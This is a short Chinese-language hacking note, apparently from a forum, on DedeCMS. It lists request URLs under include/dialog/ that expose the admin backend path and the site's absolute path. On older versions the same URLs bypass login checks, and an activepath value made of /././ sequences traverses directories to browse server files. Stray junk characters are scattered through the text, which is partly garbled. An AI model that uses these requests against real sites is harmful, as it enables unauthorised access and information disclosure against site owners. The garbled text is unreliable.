1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
4 `, ?. \5 U# C; E
m9 p3 ~8 M& }1 F {员帐号,新版本的就直接转向了后台.
. p2 } D/ U. \( z
1 T3 F$ \* |2 ^4 e7 Z. Q2.include/dialog/config.php会爆出后台管理路径1 f% N8 T- b# h" ]% Q M* k
2 a- N) |3 C; @3 k% l& r* y3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
, D b# n6 O6 D/ R3 e/ `, G8 Q9 g: n& V9 r
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
, b( S3 P7 e) ?: u3 Q! [# a0 n+ Z- O
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
0 k, v* Y9 M6 H( N
" @2 u8 `" J& n4 V! l* ^, {/ y到根目录去.不过这些版本的访问地址有些不同.4 r5 s$ U' U0 J, ]; _
地址为require/dialog/select_soft.php?activepath=/././././././././3 C5 N) [, M+ T0 C5 n, S8 G+ G
' K- N+ c8 u$ U6 linclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..* A" { }6 h- s8 m1 K& o
存在相同问题的文件还有
/ U/ s- ^1 v) T' Winclude\dialog\select_images.php, X" g6 `3 A# Z. S- A9 U, ~8 `3 R
include\dialog\select_media.php
+ J2 H* G6 ^! @8 ]" w: l' n1 Kinclude\dialog\select_templets.php
; E$ G b( A; [" c4 A& J- x8 e |